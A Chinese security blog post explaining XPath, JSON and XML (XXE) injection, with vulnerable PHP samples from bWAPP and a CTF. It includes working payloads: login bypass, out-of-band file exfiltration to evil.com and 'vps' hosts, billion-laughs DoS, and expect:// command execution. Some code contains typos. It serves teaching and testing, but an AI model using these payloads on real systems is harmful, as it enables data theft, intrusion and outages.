J0k3r

代码注入漏洞

2018-08-09

​​​

Xpath注入

当xml被用来储存数据时,类似数据库

1
2
3
4
5
6
7
<?xml version="1.0" encoding="ISO-8859-1"?>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

xpath则被用来查询xml

Xpath注入即是恶意的查询代码

这里用ichunqiu上一个例子

score.xml:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?xml version="1.0" encoding="utf-8"?>
<root>
<class num='1'>
<peo name='tom'>
<subject>
<foo>english</foo>
<score>60</score>
</subject>
<subject>
<foo>chinese</foo>
<score>70</score>
</subject>
<password>qwer123</password>
</peo>
<peo name='helen'>
<subject>
<foo>english</foo>
<score>24</score>
</subject>
<subject>
<foo>chinese</foo>
<score>34</score>
</subject>
<password>woaichishi</password>
</peo>
<peo name='vk'>
<subject>
<foo>english</foo>
<score>100</score>
</subject>
<subject>
<foo>chinese</foo>
<score>100</score>
</subject>
<password>vk123</password>
</peo>
</class>
</root>

score.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php 
if (file_exists('score.xml')){
$xml = simplexml_load_file('score.xml'); //获取xml文件里面的数据
if (isset($_GET['user'])){
$user = $_GET['user'];


//构造语句
$en_scr = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";
$ch_scr = "//peo[@name='{$user}']/subject[contains(foo, 'chinese')]/score";


$en_qu = $xml -> xpath($en_scr);
$ch_qu = $xml -> xpath($ch_scr);
foreach ($en_qu as $key => $value) {
echo $user.':<br>english is '.$value;
}
foreach ($ch_qu as $key => $value) {
echo '<br>'.'chinese is '.$value;
}
}else{
echo 'only have three user: vk, tom, helen.';
}
}
?>

$en_scr = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";便是xpath路径选取xml节点的语句

//peo[@name='{$user}']选取所有拥有值为user的name属性的peo元素

contains函数,匹配出他的foo子节点中,信息含有english的部分

找到相应的subject后,score存放分数

xpath的注入还有通过updataxml()函数实现xpath报错注入、xpath盲注

XPath Injection (Login Form) (bWAPP)

登陆判断部分:

$result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']");

闭合单引号,构造

s12.png

这是语句变成/heroes/hero[login='q' or '1'='1' and password='q' or '1'='1'],成功登陆

或只在Login里输入q' or 1=1 or '1'='1

XPath Injection (Search) (bwAPP)

$result = $xml->xpath("//hero[contains(genre, '$genre')]/movie");

构造')]/password|a[contains(aa,'获取password

s13.png

injection(hctf2015)

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
$re = array('and','or','count','select','from','union','group','by','limit','insert','where','order','alter','delete','having','max','min','avg','sum','sqrt','rand','concat','sleep');
setcookie('injection','c3FsaSBpcyBub3QgdGhlIG9ubHkgd2F5IGZvciBpbmplY3Rpb24=',time()+100000);
if(file_exists('t3st.xml')) {
$xml = simplexml_load_file('t3st.xml');
$user=$_GET['user'];
$user=str_replace($re, ' ', $user);
// $user=str_replace("'", "&apos", $user);
$query="user/username[@name='".$user."']";

$ans = $xml->xpath($query);
foreach($ans as $x => $x_value)
{
echo $x.": " . $x_value;
echo "<br />";
}
}
?>

类似sql注入,闭合单引号和[],//*选取所有元素,|计算返回两个节点集

payload: ?user=q%27]|//*|a[%27

s11.png

XPath 语法

XPath 运算符

Json注入

Json

JSON: JavaScript Object Notation(JavaScript 对象表示法),是存储和交换文本信息的语法。类似 XML。

JSON 具有层级结构(值中存在值), JSON 是纯文本

JSON 可通过 JavaScript 进行解析

JSON 数据可使用 AJAX 进行传输

根据json语法修改数据{"adduser":[{"username":"admin1","password":"123456"}]},可以注入多增加一个 password=>123456"},{"username":"admin2","password":"123456

json劫持

即某个JSON服务或者接口返回有价值的敏感的JSON数组数据,比如/api/xxx攻击者针对这个网站进行JSON劫持攻击,获取敏感信息

XML注入

有关xml我在XML External Entity attack/XXE攻击 | J0k3r有文件读取的相关内容

xxe内网信息探测

探测端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY port file SYSTEM "http://192.168.0.1:80">
]>
<p>&port;</p>
EOF;

$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r ($data);
?>

通过DTD参数实体的特性将文件内容拼接到url

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE root[
<!ENTITY % file SYSTEM "php://fileter/convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.1.100:8000/evil.dtd">
%dtd;
%send;
]>
<root></root>

evil.dtd:

<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://evil.com/?content=%file;'>"> %payload;

evil.dtd中将%file实体的内容拼接到url后,然后利用burp等工具,查看url请求就能获得需要的内容

攻击内网网站

利用xxe像内网机器发出payload请求即可

dos攻击

Billion Laughs 攻击

Billion laughs attack,xml解析的时候,中间将是一个十亿级别大小的参数,将会消耗掉系统30亿字节的内存。

POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?xml version = "1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]>
<lolz>&lol9;</lolz>

或者:

1
2
3
4
5
6
7
8
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

POC中中先定义了lol实体,值为”lol”的字符串,后在下面又定义了lol2实体,lol2实体引用10个lol实体,lol3又引用了10个lol2实体的值,依此类推,到了最后在lolz元素中引用的lol9中,就会存在上亿个”lol”字符串
此时解析数据时未做特别处理,即可能造成拒绝服务攻击。

此外还有一种可能造成拒绝服务的Payload,借助读取/dev/random实现.

远程命令执行

需要PHP的expect扩展

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTIT ex SYSTEM "expect://whoami">
]>
<p>&ex;</p>
EOF;

$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r ($data);
?>

无回显情况:

1
2
3
4
5
6
<!DOCTYPE ANY[
<!ENTITY % r SYSTEM "http://vps/e.xml">
%r;
%all;
%s;
]>

e.xml:

1
2
3
<!ENTITY % f SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">

<!ENTITY % all "<!ENTITY % s SYSTEM 'http://vps/xxe.php?f=%f;'>">

xxe.php:

1
2
3
<?php
file_put_contents("flag.txt", $_GET['f']);
?>
使用支付宝打赏
使用微信打赏

若你觉得我的文章对你有帮助,欢迎点击上方按钮对我打赏

扫描二维码,分享此文章